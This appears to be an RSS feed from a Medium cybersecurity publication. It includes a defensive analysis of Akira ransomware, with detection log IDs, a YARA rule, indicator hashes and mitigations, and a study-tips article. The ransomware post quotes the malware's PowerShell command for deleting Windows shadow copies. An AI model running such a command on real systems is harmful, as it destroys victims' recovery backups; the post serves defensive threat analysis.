<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[The Gray Area - Medium]]></title>
        <description><![CDATA[For all kinds of developers, hackers, and tech-savvy readers | Free newsletters each Wednesday on the newest tech hardware and software! | Now welcoming new writers! - Medium]]></description>
        <link>https://thegrayarea.tech?source=rss----8ae97a84818b---4</link>
        <image>
            <url>https://cdn-images-1.medium.com/proxy/1*TGH72Nnw24QL3iV9IOm4VA.png</url>
            <title>The Gray Area - Medium</title>
            <link>https://thegrayarea.tech?source=rss----8ae97a84818b---4</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Mon, 06 Jul 2026 17:52:17 GMT</lastBuildDate>
        <atom:link href="https://thegrayarea.tech/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[The New Cold War — AI]]></title>
            <description><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://thegrayarea.tech/the-new-cold-war-ai-82a53cb53574?source=rss----8ae97a84818b---4"><img src="https://cdn-images-1.medium.com/max/820/1*SxWUab5bSB7D1BYrkFTCSA.jpeg" width="820"></a></p><p class="medium-feed-snippet">What a trip to Ningbo&#x2019;s Smart City Expo taught me about China&#x2019;s AI revolution</p><p class="medium-feed-link"><a href="https://thegrayarea.tech/the-new-cold-war-ai-82a53cb53574?source=rss----8ae97a84818b---4">Continue reading on The Gray Area »</a></p></div>]]></description>
            <link>https://thegrayarea.tech/the-new-cold-war-ai-82a53cb53574?source=rss----8ae97a84818b---4</link>
            <guid isPermaLink="false">https://medium.com/p/82a53cb53574</guid>
            <category><![CDATA[artificial-intelligence]]></category>
            <category><![CDATA[robotics]]></category>
            <category><![CDATA[machine-learning]]></category>
            <category><![CDATA[ai]]></category>
            <category><![CDATA[smart-cities]]></category>
            <dc:creator><![CDATA[Andrew W. Pearson]]></dc:creator>
            <pubDate>Sun, 28 Jan 2024 01:07:22 GMT</pubDate>
            <atom:updated>2024-01-29T11:17:35.160Z</atom:updated>
        </item>
        <item>
            <title><![CDATA[The Akira Ransomware Saga: Origins, Tactics, and Countermeasures]]></title>
            <link>https://thegrayarea.tech/the-akira-ransomware-saga-origins-tactics-and-countermeasures-02f0799b34c3?source=rss----8ae97a84818b---4</link>
            <guid isPermaLink="false">https://medium.com/p/02f0799b34c3</guid>
            <category><![CDATA[malware-analysis]]></category>
            <category><![CDATA[information-security]]></category>
            <category><![CDATA[ransomware]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[SaiPrashanth Pulisetti]]></dc:creator>
            <pubDate>Thu, 18 Jan 2024 16:51:09 GMT</pubDate>
            <atom:updated>2024-01-18T16:51:09.143Z</atom:updated>
            <content:encoded><![CDATA[<p>In the ever-evolving landscape of cybersecurity threats, one name has recently gained notoriety — Akira Ransomware.</p><h4>Introduction</h4><p>This malicious software has wreaked havoc on countless individuals, businesses, and organizations, leaving a trail of encrypted data and financial losses in its wake. In this blog post, we will delve into the inner workings of Akira Ransomware, exploring its origins, mode of operation, and the implications it has for cybersecurity.</p><h4><strong>Unveiling the Origins</strong></h4><p>In March, the US and Canada were attacked with a new family of ransomware called Akira. It’s not like the Akira ransomware that Microsoft Defender Antivirus flagged in 2017. Several organizations in the US were targeted and their sensitive data was exposed by the ransomware.</p><p>Akira Ransomware first made its appearance in the cyber threat landscape in March 2023. The threat actors behind Akira employ various extortion strategies, operating a website on the TOR network (with a .onion domain). This site lists victims and any stolen information, especially if the ransom demands aren’t met. Victims are directed to this TOR-based site, using a unique identifier found in the ransom message they receive, to initiate negotiations.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1000/0*GLY1-_rVkh4UKM4K.png" /><figcaption>Akira Ransomware</figcaption></figure><h4>Changes in the 2023 Version</h4><p><strong>Targeting VPNs Lacking Multi-Factor Authentication (MFA)</strong></p><p>Threat actors started targeting <a href="https://blogs.cisco.com/security/akira-ransomware-targeting-vpns-without-multi-factor-authentication">Cisco VPNs</a> that weren’t configured for multi-factor authentication in 2023. By using this tactic, they could infiltrate organizations more easily. By implementing MFA, you’ll be able to reduce the risk of unauthorized access, including ransomware infections. In the event that a threat actor gets unauthorized access to VPN credentials, MFA provides an extra layer of protection.</p><p><strong>Advanced Attack Techniques</strong></p><p>Attackers target VPNs by exploiting exposed services or applications. Their focus is on MFA vulnerabilities and VPN software vulnerabilities. In order to get a foothold in a target network, they use LSASS dumps (Local Security Authority Subsystem Service) to extract credentials and escalate privileges. In addition, the group has been linked to using tools like PCHunter64 and creating minidumps to gather more information.</p><p><strong>Brute-Forcing vs. Purchasing Credentials</strong></p><ol><li><strong>Brute-Force: </strong>Evidence suggests the attackers used brute force and password spraying<strong>.</strong> The brute force method involves trying various combinations of usernames and passwords until the right one is found. An attacker tries a few common passwords against lots of usernames in password spraying.</li><li><strong>Purchasing Credentials through Dark Web Market</strong>: Attackers can sometimes acquire valid credentials by purchasing them on the dark web. Data breaches or other means might have made these credentials available. As the attacker would simply log in using valid credentials, this method would leave no trace in the VPN’s logs.</li></ol><p><strong>Detection from Cisco Logs</strong></p><ul><li>Login attempts with invalid username/password (<a href="https://www.cisco.com/c/en/us/td/docs/security/asa/syslog/b_syslog/syslogs1.html?bookSearch=true#con_4769508">%ASA-6–113015</a>)<br>Example:<br>%ASA-6–113015: AAA user authentication Rejected: reason = reason : local database: user = user: user IP = xxx.xxx.xxx.xxx</li><li>Remote access VPN session creation attempts for unexpected connection profiles/tunnel groups (<a href="https://www.cisco.com/c/en/us/td/docs/security/asa/syslog/b_syslog/syslogs1.html?bookSearch=true#con_4769539">%ASA-4–113019</a>, <a href="https://www.cisco.com/c/en/us/td/docs/security/asa/syslog/b_syslog/syslog-messages-722001-to-776020.html#con_4857899">%ASA-4–722041</a>, or <a href="https://www.cisco.com/c/en/us/td/docs/security/asa/syslog/b_syslog/syslog-messages-722001-to-776020.html#con_5293521">%ASA-7–734003</a>)</li></ul><p><strong>Ransomware Analysis</strong></p><p>The Akira Ransomware sample, identified by its SHA256 hash 3c92bfc71004340ebc00146ced294bc94f49f6a5e212016ac05e7d10fcb3312c, is a console-based 64-bit executable crafted using the Microsoft Visual C/C++ compiler.</p><p>The ransomware starts its operation by using the<strong> </strong>GetLogicalDriveStrings()<strong> </strong>API function to enumerate and get a list of all logical drives in the system when it’s executed. As a result, Akira drops his ransom note across multiple folders under the name “akira_readme.txt<strong>”</strong>. During its malicious activities, the ransomware scans for files and directories to encrypt. The API functions FindFirstFileW()<strong> </strong>and FindNextFileW()<strong> </strong>facilitate this encryption process. The Akira software excludes certain file extensions and names during its encryption phase, so .exe, .dll, .sys, .msi, .lnk, and .akira files aren’t affected.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1000/0*pU1kerXr-7F1vdBM.png" /><figcaption>Akira Shadow-Copy Deletion</figcaption></figure><p>The presence of the command powershell.exe -Command Get-WmiObject Win32_Shadowcopy | Remove-WmiObject within the strings extracted from Akira Ransomware&#39;s static analysis is particularly concerning. This command is a clear indication of the ransomware&#39;s intent to hamper recovery efforts. Specifically, the command utilizes PowerShell to interact with the Windows Management Instrumentation (WMI) system, targeting the Win32_Shadowcopy class. The Win32_Shadowcopy class represents the shadow copies on a system, which are essentially backup copies or snapshots of computer files or volumes. By piping (|) the results of the Get-WmiObject Win32_Shadowcopy command to Remove-WmiObject<strong>,</strong> the ransomware instructs the system to delete all existing shadow copies. This action effectively prevents victims from restoring their files to a previous state using Windows&#39; native shadow copy functionality. By eliminating this potential recovery method, Akira Ransomware further pressures its victims into paying the ransom, as traditional backup restoration options become limited or non-existent.</p><p>Akira ransomware employs a sophisticated encryption mechanism, leveraging the “Microsoft Enhanced RSA and AES Cryptographic Provider” libraries. Drawing from the CryptoAPI, it utilizes functions such as CryptAcquireContextW(), CryptImportPublicKeyInfo(), CryptGenRandom(), and CryptEncrypt(). Notably, Akira combines the robustness of both RSA and AES encryption algorithms and is equipped with a hardcoded base64 encoded public key. Upon successful encryption, it appends a distinctive .akira extension to the filenames, signaling the completion of its encryption process.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1000/0*ISjDNflOyvaImplY.png" /><figcaption>Akira Ransomware Note</figcaption></figure><p>Upon infection by Akira ransomware, victims receive a “akira_readme.txt” note. This message details the compromise of their system, warns of data exfiltration, and demands a ransom. To negotiate, victims are directed to a specific chat room on the dark web via a provided Tor link. The attackers emphasize the risks of non-compliance, including potential data sale on the dark market.</p><p><strong>Example Link:</strong></p><pre>hxxps://akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad[.]onion/</pre><h4>Public Key</h4><pre>-----BEGIN PUBLIC KEY-----<br>MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAlGDrPaVAQy+cIqMWA2v2<br>M7ntzniNYnp1hvAuxCOgTpTUN+Z2TwAR4pt2YdQD2As5e/rWgZlqsi/d31OzMSWo<br>FtliVyiSBuTtnJuoTRjGlUAazvi1PCVbckWVsZO7YDevn8lZ2ouzCRTF7X+AKyQZ<br>dpHLTfDBY/AXBkZ8BGYJjFu3kVhRQZL47VjGoQvzBi7JCCJyVfxN+KUjQtKmuxuQ<br>jDqZcqkzcppcqRXIDVm7YuogSgrcNBbdo6PBTzE0I/Cd7P/xCe5eO5ejIPtMg6I3<br>wHcIIMf5sa7h+TskS093kRVEgj3FWO1KeZBA2Ep4qM8kOw2/uN+idjOVKpLcN1zO<br>WkTXEQMIPkt9gYtItAb3VofqGhBXmM95SCRYqAagaPQXKTU2oXM5z9YvgYmG5Enb<br>TAymgAkC/u6ckAmlODH0FOsm1be9ygcTGaTuZQXQ0oQY1UvIs5kciA+wrMdmw07m<br>cvqj/Lto3fi447RqeZjkOqFQZREok+a2Wjk28FYbWKm4AWEOFNx2gAjdlXPCZr8x<br>sDlAVQ4arDhjon7j4ink1HS5Ybh+RcgvJpQgQ6QyplI4lT3YGXzE/hQnAuqeXzI3<br>ORtGLvbJ1X29buoFIFQhc/48Rm96hHYGDrr8qDkVXCDdK2ebV89ODbgIaEQSZrql<br>HA2I94pqZC43Ps8yYmBMBkcCAwEAAQ==<br>-----END PUBLIC KEY-----</pre><h4>Akira Ransomware: Key Services in its Crosshairs</h4><pre>.abcddb, .abs, .abx, .accdb, .accdc, .accde, .accdr, .accdt, .accdw, .accft, .adb, .ade, .adf, .adn, .adp, .alf, .arc, .ask, .avdx, .avhd, .bdf, .bin, .btr, .cat, .cdb, .ckp, .cma, .cpd, .dacpac, .dad, .dadiagrams, .daschema, .db-shm, .db-wal, .dbc, .dbf, .dbs, .dbt, .dbv, .dbx, .dcb, .dct, .dcx, .ddl, .dlis, .dqy, .dsk, .dsn, .dtsx, .dxl, .eco, .ecx, .edb, .epim, .exb, .fcd, .fdb, .fic, .fmp, .fmp12, .fmpsl, .fol, .fpt, .frm, .gdb, .grdb, .gwi, .hdb, .his, .hjt, .icg, .icr, .idb, .ihx, .iso, .itdb, .itw, .jet, .jtx, .kdb, .kdb, .kexi, .kexic, .kexis, .lgc, .lut, .lwx, .maf, .maq, .mar, .mas, .mav, .maw, .mdb, .mdf, .mdn, .mdt, .mpd, .mrg, .mud, .mwb, .myd, .ndf, .nnt, .nrmlib, .nsf, .nvram, .nwdb, .nyf, .odb, .oqy, .ora, .orx, .owc, .pan, .pdb, .pdm, .pnz, .pvm, .qcow2, .qry, .qvd, .raw, .rbf, .rctd, .rod, .rodx, .rpd, .rsd, .sas7bdat, .sbf, .scx, .sdb, .sdc, .sdf, .sis, .spq, .sql, .sqlite, .sqlite3, .sqlitedb, .subvol, .temx, .tmd, .tps, .trc, .trm, .udb, .udl, .usr, .vdi, .vhd, .vhdx, .vis, .vmcx, .vmdk, .vmem, .vmrs, .vmsd, .vmsn, .vmx, .vpd, .vsv, .vvv, .wdb, .wmdb, .wrk, .xdb, .xld, .xmlff</pre><p>Akira ransomware casts a wide net, targeting an extensive array of file extensions. From common database formats like .mdb, .accdb, and .sql to virtual machine-related files such as .vmdk, .vhdx, and .vmx. Its reach also extends to specialized data storage formats like .nsf, .sas7bdat, and .xmlff. This vast spectrum of targeted extensions underscores Akira&#39;s intent to cripple essential data repositories and virtual environments, amplifying its impact on victims.</p><h4>Detecting Akira Ransomware via SIEM (Security Information and Event Management)</h4><p>SIEM platforms play a pivotal role in identifying and mitigating threats like the Akira ransomware. By analyzing logs and events from various sources, SIEM can pinpoint suspicious activities indicative of a ransomware attack. Here are some potential detection strategies for Akira using SIEM:</p><p><strong>Unusual Process Execution</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/519/0*XOT0BKFufsFzcpUf.png" /><figcaption>Unusual Process Execution</figcaption></figure><p><strong>Red Flags in the Registry: Detecting Dubious Entries</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/949/0*rMCnGMePja0VrARt.png" /><figcaption>Red Flags in the Registry : Detecting Dubious Entries</figcaption></figure><p><strong>Spotting Stealth: Monitoring Unsigned Binary Executions</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/955/0*CB08NDRk8D8Ah87K.png" /><figcaption>Spotting Stealth: Monitoring Unsigned Binary Executions</figcaption></figure><p><strong>Linux Sysmon Unveiled: Tracking System Activities with Precision</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/949/0*-ezsrws7wG7BZR6q.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1000/0*4kxnQhN6PX00vEfB.png" /><figcaption>Akira Linux Executions</figcaption></figure><p><strong>Crafting the Sentinel: YARA Rules for Akira Detection</strong></p><pre>/*<br>Akira ransomware<br>*/<br>rule Akira<br>{<br>    meta:<br>        author = &quot;rivitna&quot;<br>        family = &quot;ransomware.akira.windows&quot;<br>        description = &quot;Akira ransomware Windows payload&quot;<br>        severity = 10<br>        score = 100<br>strings:<br>        $s0 = &quot;\x00--encryption_path\x00&quot; ascii<br>        $s1 = &quot;\x00--share_file\x00&quot; ascii<br>        $s2 = &quot;\x00--encryption_percent\x00&quot; ascii<br>        $s3 = &quot;\x00-fork\x00&quot; ascii<br>        $s4 = &quot;\x00Failed to read share files\x00&quot; ascii<br>        $s5 = &quot;:\\akira\\asio\\include\\&quot; ascii<br>        $s6 = &quot;\x00write_encrypt_info error: \x00&quot; ascii<br>        $s7 = &quot;\x00encrypt_part error: \x00&quot; ascii<br>        $s8 = &quot;\x00Detected number of cpus = \x00&quot; ascii<br>        $s9 = &quot;\x00No path to encrypt\x00&quot; ascii<br>        $s10 = &quot;Paste this link - https://akira&quot; ascii<br>        $s11 = &quot;-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA&quot; ascii<br>        $s12 = &quot;\x00Trend Micro\x00&quot; wide<br>        $s13 = &quot; :Failed to make full encrypt\x00&quot; wide<br>        $s14 = &quot; :Failed to make spot encrypt\x00&quot; wide<br>        $s15 = &quot; :Failed to make part encrypt\x00&quot; wide<br>        $s16 = &quot; :Failed to write header\x00&quot; wide<br>        $s17 = &quot; :file rename failed. System error: \x00&quot; wide<br>        $h0 = { 41 BA 05 00 00 00 41 80 FB 32 44 0F 42 D0 33 D2 48 8B C?<br>                49 F7 F2 4C 8B C8 B9 02 00 00 00 41 B8 04 00 00 00<br>                41 80 FB 32 44 0F 42 C1 41 8B C8 48 0F AF C8 48 2B F9 33 D2<br>                48 8B C7 49 F7 F2 }<br>        $h1 = { C7 45 ?? 03 00 00 00 80 7D ?? 31 76 07 C7 45 ?? 05 00 00 00<br>                0F B6 45 ?? 48 0F AF 45 ?? 48 C1 E8 02<br>                48 B? C3 F5 28 5C 8F C2 F5 28 48 F7 E? 48 89 ?? 48 C1 E8 02 }<br>    condition:<br>        (((uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)) or<br>         (uint32(0) == 0x464C457F)) and<br>        (<br>            (7 of ($s*)) or<br>            (1 of ($h*))<br>        )<br>}</pre><p><strong>Indicators Of Compromise</strong></p><pre>v1 (Windows)<br>3c92bfc71004340ebc00146ced294bc94f49f6a5e212016ac05e7d10fcb3312c<br>7b295a10d54c870d59fab3a83a8b983282f6250a0be9df581334eb93d53f3488<br>678ec8734367c7547794a604cc65e74a0f42320d85a6dce20c214e3b4536bb33<br>67afa125bf8812cd943abed2ed56ed6e07853600ad609b40bdf9ad4141e612b4<br>8631ac37f605daacf47095955837ec5abbd5e98c540ffd58bb9bf873b1685a50<br>1b6af2fbbc636180dd7bae825486ccc45e42aefbb304d5f83fafca4d637c13cc<br>2084ab8f92a86a37a35879378610949e21ea7b5030313655bb82fe6c67772b0d<br>4aaa583a9c554ea8e73d4dee0d53eb12dda17df16388f96c0f6ddbaafbcda813<br>920384692233578a59fc8de2b0205fd9fb20bb0d75c1d5a1534377abf0fc08bc<br>2b28270c1675990a2c78b31faab547fb75948dd1c2b22e892377ee5e40abebc2<br>4839fd081e720d7d5091274470679c120378196e1f4faf80c4bac08d8ee7bb8c<br>9ca333b2e88ab35f608e447b0e3b821a6e04c4b0c76545177890fb16adcab163<br>d0510e1d89640c9650782e882fe3b9afba00303b126ec38fdc5f1c1484341959<br>473326da3fff09ee3e486f5f39c090690437ac8bf8bdce556c8033e8f0d730fc<br>6cadab96185dbe6f3a7b95cf2f97d6ac395785607baa6ed7bf363deeb59cc360<br>337d21f964091417f22f35aee35e31d94fc3f35179c36c0304eef6e4ae983292<br>772eb611c9ca20b461536fd0bd87d553dcecf3f4c82e26c2378cad40bbf4b0b0<br>b3f473b0fd752fcd8b0d5983366c4ccccdacdceb8d6ba25fcb02b34c622cca78<br>cfbcea795524c69a6d28fd9e60e07437d8f2abd23812109430ca2efd46606310</pre><pre>v2 (Windows)<br>2e2ad6392e75d5a5155498c2a76cb373d17ca3ad4ba57c6d33c623fca5e29342<br>3f4ceeada7ff021c30df1646437d2ab0e55997bbb281444501f6d1f4ea8fa209<br>4cb8365b18b1c319d374be0b9d219144c20fb8714e9cf346e655f854d2c60170<br>637e28b38086ff9efd1606805ff57aaf6cdec4537378f019d6070a5efdc9c983<br>92072945358b605c024b9e3335fb33b82faf33048c56f5529aaf5af4bf0c1b30<br>c239dadd55b55b817fda5b0c2bb062adf399a5b78a8b3280a473d3ae66f81777<br>fb2433beb961839b36198e242d0dedb7fa85ab3e08a1141d02874aa4235ac776<br>2a9257c6c74e37d051f78ed5abaa620b71b27fa3604798af077256a128d911bb<br>89f5f29cf6b5bcfc85b506fb916da66cb7fd398cf6011d58e9409c7813e1a6f3<br>8738ba49fcd520789569aea7bf7af890741a745c79ae2bef49b93fb46c076c2b<br>27009c0abd2709cd5cac4c0135b8f3bed3229b0921601638ba9e90713ede91ea</pre><pre>v3 (megazord) (Windows)<br>c9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0</pre><pre>Linux<br>1d3b5c650533d13c81e325972a912e3ff8776e36e18bca966dae50735f8ab296</pre><h4><strong>Proactive measures against Akira ransomware</strong></h4><ol><li>Keep an eye out for suspicious email attachments and links. Check the sender’s legitimacy before you open anything.</li><li>Make sure you only download files and programs from trusted stores and official websites. Click away from dubious sites.</li><li>Regular updates: Make sure all your software is up to date. Patching vulnerabilities helps stop cybercriminals from exploiting them.</li><li>Enable multi-factor authentication (MFA) wherever possible and implement strong password policies. It adds another layer of security.</li><li>Keep your critical data backed up offline regularly. Updating these backups will provide a fallback in case of a ransomware attack.</li><li>Report Suspicious Activities: If you suspect ransomware or become a victim of it, report it to the appropriate authorities. It can help track cybercrime activity and perhaps prosecute the criminals.</li><li>Train and Educate: Make sure your employees and users are up-to-date on the latest ransomware threats.</li></ol><h4>Conclusion</h4><p>Thank you for taking the time to read this article. We hope it provided valuable insights and actionable recommendations to safeguard against the Akira ransomware threat. Knowledge is a powerful tool in the fight against cyber threats, and sharing this information can make a difference.</p><p><a href="https://medium.com/the-gray-area"><strong>The Gray Area</strong></a><strong> </strong>is a collection of great cybersecurity and computer science posts. Become a writer for The Gray Area by filling out <a href="https://forms.gle/MpZD2wE4LhJqCufR7"><strong>this form</strong></a>! To get updates whenever The Gray Area publishes an article, check out our Twitter page, <a href="https://twitter.com/TGAonMedium?s=20&amp;t=R_mmy5ZFGXAluwT3UuLmzw"><strong>@TGAonMedium</strong></a><strong>.</strong></p><p><a href="https://thegrayarea.tech">The Gray Area</a></p><h4>References</h4><ul><li><a href="https://www.business-standard.com/technology/tech-news/akira-ransomware-what-makes-this-ransomware-a-national-level-threat-123072400333_1.html">Akira Ransomware: What makes this ransomware a national-level threat?</a></li><li><a href="https://blogs.cisco.com/security/akira-ransomware-targeting-vpns-without-multi-factor-authentication">Akira Ransomware Targeting VPNs without Multi-Factor Authentication</a></li><li><a href="https://www.pcrisk.com/removal-guides/26677-akira-ransomware">Akira Ransomware</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=02f0799b34c3" width="1" height="1" alt=""><hr><p><a href="https://thegrayarea.tech/the-akira-ransomware-saga-origins-tactics-and-countermeasures-02f0799b34c3">The Akira Ransomware Saga: Origins, Tactics, and Countermeasures</a> was originally published in <a href="https://thegrayarea.tech">The Gray Area</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[The Automation of Marketing]]></title>
            <description><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://thegrayarea.tech/the-automation-of-marketing-f98df6d132ab?source=rss----8ae97a84818b---4"><img src="https://cdn-images-1.medium.com/max/1024/1*OnQDCeyDhDQJtRTgOuh4MA.png" width="1024"></a></p><p class="medium-feed-snippet">While the concept of one-to-one marketing is two decades old, the technology needed to embrace it hasn&#x2019;t been ready until now.</p><p class="medium-feed-link"><a href="https://thegrayarea.tech/the-automation-of-marketing-f98df6d132ab?source=rss----8ae97a84818b---4">Continue reading on The Gray Area »</a></p></div>]]></description>
            <link>https://thegrayarea.tech/the-automation-of-marketing-f98df6d132ab?source=rss----8ae97a84818b---4</link>
            <guid isPermaLink="false">https://medium.com/p/f98df6d132ab</guid>
            <category><![CDATA[customer-relationships]]></category>
            <category><![CDATA[iot]]></category>
            <category><![CDATA[machine-learning]]></category>
            <category><![CDATA[artificial-intelligence]]></category>
            <category><![CDATA[personalization]]></category>
            <dc:creator><![CDATA[Andrew W. Pearson]]></dc:creator>
            <pubDate>Thu, 18 Jan 2024 16:46:01 GMT</pubDate>
            <atom:updated>2024-01-18T16:46:01.783Z</atom:updated>
        </item>
        <item>
            <title><![CDATA[Active Recall & Spaced Repetition in Cybersecurity]]></title>
            <link>https://thegrayarea.tech/active-recall-spaced-repetition-in-cybersecurity-2449b13268ae?source=rss----8ae97a84818b---4</link>
            <guid isPermaLink="false">https://medium.com/p/2449b13268ae</guid>
            <category><![CDATA[technology]]></category>
            <category><![CDATA[learning]]></category>
            <category><![CDATA[students]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[hacking]]></category>
            <dc:creator><![CDATA[Sara V]]></dc:creator>
            <pubDate>Thu, 18 Jan 2024 16:33:45 GMT</pubDate>
            <atom:updated>2024-07-15T21:02:20.247Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*fyKcnU7HdUXAL7HV" /><figcaption>Photo by <a href="https://unsplash.com/@punttim?utm_source=medium&amp;utm_medium=referral">Tim Gouw</a> on <a href="https://unsplash.com?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><p><em>Short answer: draw mind maps, teach the topic, build homelabs, practice questions, summary sheets</em></p><p>Cognitive psychology is the study of how humans process information such as attention, learning, memory, perception, problem solving, and reasoning. Not only does cognitive psychology apply to learning, but all aspects of cybersecurity from behavior to biometrics to social engineering. It is about making sense of human behavior. In this article and future articles, we will be applying knowledge and techniques published by cognitive psychologists and neuroscientists to cybersecurity knowledge.</p><h3>Active Recall and Spaced Repetition</h3><p>If you’ve looked at any study content online recently, you’ll probably see a ridiculous amount around active recall and spaced repetition. Active recall is trying to remember the something and spaced repetition is studying the content as you start to forget it. In the late 1800s, cognitive psychologist, Hermann Ebbinghaus discovered what we know as the Forgetting Curve. The Forgetting Curve shows how we forget information over time if we make no effort to solidify the information.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*brgsxs7OkciNUyc0b_8f8A.jpeg" /></figure><p>While they are decent methods, they are being sold as golden path to studying when in fact there are issues.</p><h3>Issues with Active Recall and Spaced Repetition</h3><h4><strong>Issue 1: Everything is memorization-based.</strong></h4><p>How do flashcards make you connect the information you’re learning together? They don’t. I won’t dive into this issue too much, that will be another article.</p><h4><strong>Issue 2: The forgotten part of Ebbinghaus’ theory.</strong></h4><p>This is heavily tied to Issue 1. It often get’s missed that Ebbinghaus’ theory also mentions to make recall easier is to anchor the information to what you already know. Let’s say you’re learning Linux, you come across the command “dhclient” to clear out the DHCP lease. The command can know be anchored to what you know about DHCP. Similarly, if there’s a piece of software you currently know, chances are you can relate a new piece of software to it. Anchoring can be done through protocols, theories, processes, domains, etc.</p><h4><strong>Issue 3: Overwhelming load.</strong></h4><p>One point about spaced repetition is that if you don’t pass the active recall on one of the flashcards, that flashcard will go back to the first review. For example, let’s say you’re working through a flashcard you haven’t reviewed for one week, if you get it right, then next time you review it should be in one month. Let’s say you get the question wrong, then the card will be in your review the next day. We all hope we never miss any, but it’s normal to miss questions especially when learning. Eventually, we will all run into a day where the flashcards seem never ending — new cards, older flashcards, and flashcards we’ve previously missed.</p><h4><strong>Issue 4: Lack of dimensionality.</strong></h4><p>If you read my last article, you’ll know understanding a topic from multiple angles is beneficial. With multiple dimensions, you’re able to answer trick questions, think through relationships thoroughly, draw conclusions, accurately answer long-form questions, and teach the information.</p><h4><strong>Issue 5: No progress in your studying methods.</strong></h4><p>One of the major drawbacks of just practicing flashcards on a regular schedule is there is no long term benefit to our study techniques and no progress in our forgetting curves. We will only have learned the content and forced ourselves through painful flashcards. There have been numerous peer reviewed research articles supporting the theory of multiple study methods having increased the retrieval for each spaced repetition. Eventually, we will be able to modify our forgetting curve’s to look something like the following:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_XcMMnMUpyu6ja5jgEu-Nw.jpeg" /><figcaption>Improved Forgetting Curve</figcaption></figure><h3>Corrections of Active Recall and Spaced Repetition</h3><p>To refine our active recall and spaced repetition, it’s recommended to follow the same retrieval schedule but with the methods from the below article:</p><p><a href="https://medium.com/@saravra/studying-in-cybersecurity-part-1-49e68d19cca5">Studying in Cybersecurity</a></p><p>In case you missed it, the methods were to</p><ul><li>Draw mind maps</li><li>Teach the topic</li><li>Build homelabs</li><li>Practice questions</li><li>Summary sheets</li></ul><h3>Overview</h3><p>The standard active recall and spaced repetition we know from the internet has a number of flaws, but with minor corrections, we can make them more effective. Currently, active recall and spaced repetition lacks forming relationships between topics, forming relationships with what we currently know, can be overwhelming and mundane, lacks being able to answer difficult questions, and serves a single long-term goal — memorize the information.</p><p>A huge shout out to <a href="https://www.youtube.com/@JustinSung">Justin Sung</a> on Youtube who has saved my butt may times in learning, note taking, and studying! Definitely check his content out!</p><p><a href="https://medium.com/@sarasheon/subscribe">Follow or subscribe</a> for the next article!</p><p><a href="https://medium.com/the-gray-area"><strong>The Gray Area</strong></a><strong> </strong>is a collection of great cybersecurity and computer science posts. Become a writer for The Gray Area by filling out <a href="https://forms.gle/MpZD2wE4LhJqCufR7"><strong>this form</strong></a>! To get updates whenever The Gray Area publishes an article, check out our Twitter page, <a href="https://twitter.com/TGAonMedium?s=20&amp;t=R_mmy5ZFGXAluwT3UuLmzw"><strong>@TGAonMedium</strong></a><strong>.</strong></p><p><a href="https://thegrayarea.tech">The Gray Area</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=2449b13268ae" width="1" height="1" alt=""><hr><p><a href="https://thegrayarea.tech/active-recall-spaced-repetition-in-cybersecurity-2449b13268ae">Active Recall &amp; Spaced Repetition in Cybersecurity</a> was originally published in <a href="https://thegrayarea.tech">The Gray Area</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[How to Use Flashcards in Cybersecurity]]></title>
            <link>https://thegrayarea.tech/flashcards-in-cybersecurity-792014609f68?source=rss----8ae97a84818b---4</link>
            <guid isPermaLink="false">https://medium.com/p/792014609f68</guid>
            <category><![CDATA[education]]></category>
            <category><![CDATA[hacking]]></category>
            <category><![CDATA[technology]]></category>
            <category><![CDATA[learning]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[Sara V]]></dc:creator>
            <pubDate>Thu, 18 Jan 2024 16:31:00 GMT</pubDate>
            <atom:updated>2024-07-15T21:03:51.189Z</atom:updated>
